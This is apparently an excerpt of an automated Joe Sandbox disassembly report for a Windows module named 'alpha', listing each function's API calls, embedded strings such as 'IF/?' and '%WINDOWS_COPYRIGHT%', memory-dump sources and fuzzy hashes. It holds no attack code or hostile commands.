                              • Opcode ID: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                              • Instruction ID: 3edd747d2199c897a522bd6553674ebe464d90abb40cf5eea045486bc718f3b2
                              • Opcode Fuzzy Hash: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                              • Instruction Fuzzy Hash: 9451B632A0C682C9EB20BF12D8812B9B3A0FB45B95F884135DE4D476D9EF3DE551E720
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: iswdigit
                              • String ID: GeToken: (%x) '%s'
                              • API String ID: 3849470556-1994581435
                              • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                              • Instruction ID: 71ad371b7eaf1b042f937ec726f05ad92c86e8e437788caaa9165878371b26b0
                              • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                              • Instruction Fuzzy Hash: 67515721A0C652C5F724BF57A488279BAA0FB94B54F898035DE5D433D8DF7CE840A720
                              APIs
                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F29A10
                              • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F29994
                                • Part of subcall function 00007FF744F2A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF744F29A82), ref: 00007FF744F2A77A
                                • Part of subcall function 00007FF744F2A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF744F29A82), ref: 00007FF744F2A839
                                • Part of subcall function 00007FF744F2A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF744F29A82), ref: 00007FF744F2A850
                              • wcsrchr.MSVCRT ref: 00007FF744F29A62
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ErrorLast$CloseEnumOpenwcsrchr
                              • String ID: %s=%s$.
                              • API String ID: 3242694432-4275322459
                              • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                              • Instruction ID: 9458a3f77c32027030299baf705d7ec20bb33211ee9e05745ac92dc0288a6f3b
                              • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                              • Instruction Fuzzy Hash: 87418F21B0D742D6FB20BF52A0D46B9E2A0FF857A0F984230DD5D07BD9DE7DE841A621
                              APIs
                              • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF744F254E6
                              • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF744F2552E
                                • Part of subcall function 00007FF744F2758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF744F26999,?,?,?,?,?,00007FF744F18C39), ref: 00007FF744F275AE
                                • Part of subcall function 00007FF744F2758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF744F26999,?,?,?,?,?,00007FF744F18C39), ref: 00007FF744F275C6
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ErrorLast$CreateCurrentMutexProcess
                              • String ID: Local\SM0:%d:%d:%hs$wil$x
                              • API String ID: 779401067-630742106
                              • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                              • Instruction ID: 531682a42dd5e595d84137838f8262ab961d76ffc342aee04beb6b73c5d69694
                              • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                              • Instruction Fuzzy Hash: 0F51517261CA82C2EB11BF12E4817FAE761FB84784F985031DE4D4BA99DE3DE5059720
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CurrentDirectorytowupper
                              • String ID: :$:
                              • API String ID: 238703822-3780739392
                              • Opcode ID: a6328a6c3dc4b43d0528279963caee78f723bc6a38f6b0cfe87d14265630f542
                              • Instruction ID: 6a1739d4197885be1fa52fd6ff8288cd383429b62c7c3149edcad05856b9d2c0
                              • Opcode Fuzzy Hash: a6328a6c3dc4b43d0528279963caee78f723bc6a38f6b0cfe87d14265630f542
                              • Instruction Fuzzy Hash: 9311225260C641C6EB25BF22A885279F6F0FF89B9AF898032DD0D077D8DE3CD401A724
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                              • API String ID: 3677997916-3870813718
                              • Opcode ID: f05f94d0e8c90ab29cc9672b6bad58f1af5175f7397cd948b2f834cc6da7e466
                              • Instruction ID: 12c99cc74c7c9501c942a234a230a2c28cdc0197fa1eb933d34c7904247d1490
                              • Opcode Fuzzy Hash: f05f94d0e8c90ab29cc9672b6bad58f1af5175f7397cd948b2f834cc6da7e466
                              • Instruction Fuzzy Hash: 2E114F3261DB45C7E720EF51E48426AF760FB867A4F845131DA8D02BA8DF7CD048DB10
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memsetwcsrchr$wcschr
                              • String ID:
                              • API String ID: 110935159-0
                              • Opcode ID: aa437b30edfeea6c79ee8a3d268e9650db73263b89b04e44864cdff78747c223
                              • Instruction ID: 64850c81aa5c64565f59349cb8ff4efdcc1a27e937297cdf75b005b3a0e97741
                              • Opcode Fuzzy Hash: aa437b30edfeea6c79ee8a3d268e9650db73263b89b04e44864cdff78747c223
                              • Instruction Fuzzy Hash: 1751C922B0D682D5FB21BF5395853F9E290BB89BA4F8D4531CD5D077C9DE3CE541A210
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$CurrentDirectorytowupper
                              • String ID:
                              • API String ID: 1403193329-0
                              • Opcode ID: 551be3f87909853a01787b2c064555cc9cf119e68c8c6485403ce92ba455aa8e
                              • Instruction ID: ff57a0c5e879edbc62072159cd9d456372d70bc833037fdf1f1642a3676038f4
                              • Opcode Fuzzy Hash: 551be3f87909853a01787b2c064555cc9cf119e68c8c6485403ce92ba455aa8e
                              • Instruction Fuzzy Hash: 5A518726A0D681C6EB25BF2299906B9B7B0FF44758F898135CE4E076D8DF3CD944A720
                              APIs
                              • memset.MSVCRT ref: 00007FF744F0921C
                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF744F093AA
                                • Part of subcall function 00007FF744F08B20: wcsrchr.MSVCRT ref: 00007FF744F08BAB
                                • Part of subcall function 00007FF744F08B20: _wcsicmp.MSVCRT ref: 00007FF744F08BD4
                                • Part of subcall function 00007FF744F08B20: _wcsicmp.MSVCRT ref: 00007FF744F08BF2
                                • Part of subcall function 00007FF744F08B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F08C16
                                • Part of subcall function 00007FF744F08B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F08C2F
                                • Part of subcall function 00007FF744F08B20: wcschr.MSVCRT ref: 00007FF744F08CB3
                                • Part of subcall function 00007FF744F1417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF744F141AD
                                • Part of subcall function 00007FF744F13060: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,0000000A,00007FF744F092AC), ref: 00007FF744F130CA
                                • Part of subcall function 00007FF744F13060: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F130DD
                                • Part of subcall function 00007FF744F13060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F130F6
                                • Part of subcall function 00007FF744F13060: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F13106
                              • wcsrchr.MSVCRT ref: 00007FF744F092D8
                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F09362
                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F09373
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                              • String ID:
                              • API String ID: 3966000956-0
                              • Opcode ID: b940a3ae0cbd3b0dcc09caeba803782aba8febc90d450ee18c078e27142e0860
                              • Instruction ID: 9977b9394cfed374984784c542f1a6e826c9a196667761af652819163b531725
                              • Opcode Fuzzy Hash: b940a3ae0cbd3b0dcc09caeba803782aba8febc90d450ee18c078e27142e0860
                              • Instruction Fuzzy Hash: E1518432A0D682C5EB61BF12D4946B9A3A4FB89B44F884035DE4D07BD9EF3CE551D710
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$_setjmp
                              • String ID:
                              • API String ID: 3883041866-0
                              • Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                              • Instruction ID: 1b07fd967b6852c9a62d21352cedaf2fa829f14f46e09f35c8833a3c848662b8
                              • Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                              • Instruction Fuzzy Hash: CB513F72A0CB86CAEB61AF22D8943E9B7A4EB85748F844135DA4D47A8CDF3CD644D710
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$FreeProcess_setjmp
                              • String ID:
                              • API String ID: 777023205-0
                              • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                              • Instruction ID: 2f355adb4958759424d8430ded893d2b1ecac5a46c6c1c32609d4f7c0f7f34f4
                              • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                              • Instruction Fuzzy Hash: 3051243094DA42CAFB10BF53A8C4579F6A0BF98790FDC5435DE4D427E9DE3CA440A621
                              APIs
                              • _wcsicmp.MSVCRT ref: 00007FF744F0B4BD
                                • Part of subcall function 00007FF744F106C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106D6
                                • Part of subcall function 00007FF744F106C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106F0
                                • Part of subcall function 00007FF744F106C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F1074D
                                • Part of subcall function 00007FF744F106C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F10762
                              • _wcsicmp.MSVCRT ref: 00007FF744F0B518
                              • _wcsicmp.MSVCRT ref: 00007FF744F0B58B
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$_wcsicmp$AllocProcess
                              • String ID: ELSE$IF/?
                              • API String ID: 3223794493-1134991328
                              • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                              • Instruction ID: 119d58bdaff431978a18ef9eaa38422f32e52a8a34d0acedfaa2fe9abc6f654d
                              • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                              • Instruction Fuzzy Hash: 08415C21E1D653C2FB55BFA7A4992B9A661AF84740FCC5075DE0D072DEDE3CE800A720
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                              • String ID:
                              • API String ID: 1532185241-0
                              • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                              • Instruction ID: 9659b0c14fb776087d9df37409ceccc8d305594df89b30e7fd29bc0abe352dfc
                              • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                              • Instruction Fuzzy Hash: A741CF32A08751CBE710BF22948557EBBA1FB88B80F985535EE0A477C8CF3DE8419710
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                              • String ID:
                              • API String ID: 3588551418-0
                              • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                              • Instruction ID: ba5bc4421ba938203d89dceb95912afbcce1c3db88f950ff148d71d205a4a8dd
                              • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                              • Instruction Fuzzy Hash: 27417E31A0C242CBE724BF5294C467DF661FB85B81F985439DE4A477D9CE7CE840AB60
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ErrorModememset$FullNamePath_wcsicmp
                              • String ID:
                              • API String ID: 2123716050-0
                              • Opcode ID: 6424c7caf3ba124e77cb4cf79b3ec375c840d0e262fe90f70dc7f5ef3c4399ca
                              • Instruction ID: 2ee398e939208bad924701480a1b1743a8436dbe89e8b9b6acbef363bc9b7665
                              • Opcode Fuzzy Hash: 6424c7caf3ba124e77cb4cf79b3ec375c840d0e262fe90f70dc7f5ef3c4399ca
                              • Instruction Fuzzy Hash: 914192327096C1CAEB75EF22D8903E967A4FB49B88F484134DE4D4AA9CDE3CD7449710
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                              • String ID:
                              • API String ID: 3114114779-0
                              • Opcode ID: 1d3c40c4db9270235dfbff6205660991289e4dcca270832023e59d6b38883110
                              • Instruction ID: 17151d7b19cfd643087b3c311a53cdc4a7c138a2eec95d7974445837ee1e43e0
                              • Opcode Fuzzy Hash: 1d3c40c4db9270235dfbff6205660991289e4dcca270832023e59d6b38883110
                              • Instruction Fuzzy Hash: A2413B36B09B42CAE700EF66D4842AC77A5FB88748F994135DE0D93798DF38E405D760
                              APIs
                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF744F29A82), ref: 00007FF744F2A77A
                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF744F29A82), ref: 00007FF744F2A7AF
                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF744F29A82), ref: 00007FF744F2A80E
                              • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF744F29A82), ref: 00007FF744F2A839
                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF744F29A82), ref: 00007FF744F2A850
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: QueryValue$CloseErrorLastOpen
                              • String ID:
                              APIs
                                • Part of subcall function 00007FF744F101B8: _get_osfhandle.MSVCRT ref: 00007FF744F101C4
                                • Part of subcall function 00007FF744F101B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F101D6
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF744F2D0F9
                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF744F2D10F
                              • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF744F2D166
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF744F2D17A
                              • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF744F2D18C
                              Similarity
                              • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                              • String ID:
                              APIs
                              • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF744F2C9EE,?,?,?,00007FF744F2EA6C,?,?,?,00007FF744F2E925), ref: 00007FF744F15CCB
                              • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,00007FF744F2C9EE,?,?,?,00007FF744F2EA6C,?,?,?,00007FF744F2E925), ref: 00007FF744F15CDF
                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF744F15D03
                              • fprintf.MSVCRT ref: 00007FF744F1F4A9
                              • fflush.MSVCRT ref: 00007FF744F1F4C2
                              Similarity
                              • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                              • String ID:
                              APIs
                              Strings
                              Similarity
                              • API ID: CreateSemaphore
                              • String ID: _p0$wil
                              APIs
                              • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF744F2B934
                              • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF744F15085), ref: 00007FF744F2B9A5
                              • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF744F15085), ref: 00007FF744F2B9F7
                              Strings
                              Similarity
                              • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                              • String ID: %WINDOWS_COPYRIGHT%
                              APIs
                              Strings
                              Similarity
